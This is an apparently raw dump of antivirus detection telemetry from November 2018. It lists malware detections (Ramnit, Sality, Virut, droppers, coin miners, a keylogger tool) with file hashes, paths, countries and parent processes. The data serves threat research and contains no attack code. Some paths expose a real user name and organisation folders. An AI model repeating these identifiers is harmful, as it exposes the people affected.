  Row(detection=Row(filename='avscan-20181102-000542-55d427e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e01097b3\\AVSCAN-20181102-000526-537DDDBA\\AVSCAN-20181102-000542-55D427E6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='it.pif', filepath='F:\\New folder\\Corel Draw 12\\Apple\\IT\\IT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='Z:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T17:19:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1b316ea1869fd582898bbdc64a464165e30af0b12851bf82cb8d45aaba007eab.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1B316EA1869FD582898BBDC64A464165E30AF0B12851BF82CB8D45AABA007EAB.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1b316ea1869fd582898bbdc64a464165e30af0b12851bf82cb8d45aaba007eab', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:20:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:36:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[5].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[5].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174402-e6c6b37d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_44ba55ea\\AVSCAN-20181101-174258-E1411135\\AVSCAN-20181101-174402-E6C6B37D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:44:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msbeul.exe', filepath='\\\\?\\C:\\ProgramData\\msbeul.exe', filesize=96592000, name='TR/Taranis.3959.#M1.#R1'), hash='2e4f95f9a6e74f4f5de8d8e1875859d90171f08a73d9002062c835a6dbe475cd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:19:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Yeni klasör\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Yeni klasör\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:14:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mysqlimport.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Version Cue CS4\\Server\\database-template\\bin\\x86\\mysqlimport.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='0652e2e8370571321214c4aefe78114a203dd646e79e2ec035ffe970e18673d8', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV bworamm2EEOVuB+M.1.3 -SendFullTelemetry -ThrottleUtc', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T18:08:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtwcodecsd4.dll', filepath='d:\\steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\codecs\\qtwcodecsd4.dll', filesize=576000, name='W32/Ramnit.C.#M1.#R1'), hash='52ee3b80822eff5e263376a2c5ded1074043a7112ffaf7f8d56bd58da6262c31', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:42:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2bdda4eb692cfaced9e1378b3354daa685f257ea6d35656403faac8aebdbd273', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2BDDA4EB692CFACED9E1378B3354DAA685F257EA6D35656403FAAC8AEBDBD273', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2bdda4eb692cfaced9e1378b3354daa685f257ea6d35656403faac8aebdbd273', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115051-f991c7d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a6478a3\\AVSCAN-20181101-114551-D907279B\\AVSCAN-20181101-115051-F991C7D7', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T15:04:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114533-6b51a9a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cc180c4\\AVSCAN-20181101-114520-68CF0A75\\AVSCAN-20181101-114533-6B51A9A6', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:45:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215230-f19029ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c140b373\\AVSCAN-20181101-215214-EF4FCD1B\\AVSCAN-20181101-215230-F19029FF', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:52:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='de.scr', filepath='F:\\New folder\\Corel Draw 12\\Apple\\DE\\DE.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20a5f49efcf370d20cb2ab55aeec37cdbf7cd036d41d6549dd182830798dba2b.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\01.12.2017-32.available\\Avira\\Others\\PE-detected-Avira\\Adware.Adstantinko.yotjq\\20a5f49efcf370d20cb2ab55aeec37cdbf7cd036d41d6549dd182830798dba2b.MRG', filesize=768000, name='Adware/Adstantinko.yotjq.#M1.#R1'), hash='20a5f49efcf370d20cb2ab55aeec37cdbf7cd036d41d6549dd182830798dba2b', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\01.12.2017-5.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T12:03:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152549-b551bdf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152549-B551BDF0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171408-3d5a36cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_663900e3\\AVSCAN-20181101-170107-D099EE44\\AVSCAN-20181101-171408-3D5A36CB', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\odym5bjoeza\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-01T16:58:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath='K:\\HBCD\\Programs\\PASSMARKKEYBOARDTEST.EXE', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comunicazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\COMUNICAZIONE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvlruic.exe', filepath='C:\\ProgramData\\msvlruic.exe', filesize=75360000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='89bcffc47c2666a12606e123b04c95de9dd3a61cf7d8cab0dfac956dc6796356', metadata=Row(cmdline='--engine=2 --session-id=3bTAG96ZOM7x7\\\\\\/HeLwEiGpThYE33uOblW\\\\\\/CeDG07 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-01T01:50:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patentino muletto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA\\PATENTINO MULETTO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mamep64.exe', filepath='G:\\임시\\MAMEPlus_r5275_0168_2_x64_NoNag\\mamep64.exe', filesize=142528000, name='HEUR/AGEN.1018733.#M1.#R1'), hash='9e2793e3fde0523bc9549adb0e1898693a6b9dfa43ca91d923b948b47b17cab3', metadata=Row(cmdline='\\\\\\"G:\\\\\\\\백종원의+골목식당.E38.181031.1080p-NEXT.mp4.torrent\\\\\\"', country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\uttorrent_2.0.4_portable\\utorrent.exe', parentsize=328568, timestamp='2018-11-01T08:41:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151803-5c042b80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151803-5C042B80', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='twatdglt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\TWaTDGLt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212340-ecab31b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212340-ECAB31B8', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\SERVER-GOLD\\HOME\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='modulo 3.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Moduli 1-7\\Modulo 3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095044-46e44b76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095044-46E44B76', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwr_toolbars_tb_08.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_toolbars_tb_08.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9addbc19b6296f9310bcca3c9db0c8729958c1f0b46409718fc15e53ee0bec08', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T09:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='italiano ppt.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\italiano PPT.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235644-fe6e8497', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235644-FE6E8497', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182501-296001ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182501-296001AE', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173010-cf02dcc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-172214-3847C684\\AVSCAN-20181101-173010-CF02DCC2', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='b2e37e15e5a87138ec89400a74b48175f6c7731bda70e808ee26865713b56329', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='F:\\autorun.inf\\autorun.inf.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='05-th-charm-of-au.exe', filepath='E:\\font thai\\05-TH-Charm-of-AU\\05-TH-Charm-of-AU.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='9ea3246caf376fc337c7a1e37b21c88bb60dd5fe7c1c8a177e001bf257b2277d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T01:28:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-132142-469f4557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132142-469F4557', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1abac613.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1abac613.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='C:\\Users\\X\\Desktop\\Gsm Box Cracked Full Pack By TCS\\AutoPlay\\Docs\\TM Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\Gsm Box Cracked Full Pack By TCS.rar\\\\\\"', country='CM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinZip\\winzip32.exe', parentsize=89489472, timestamp='2018-11-04T10:51:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131034-142bcfee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131034-142BCFEE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\caderno enel\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T05:29:15Z'), dt=datetime.date(2018, 11, 4)),
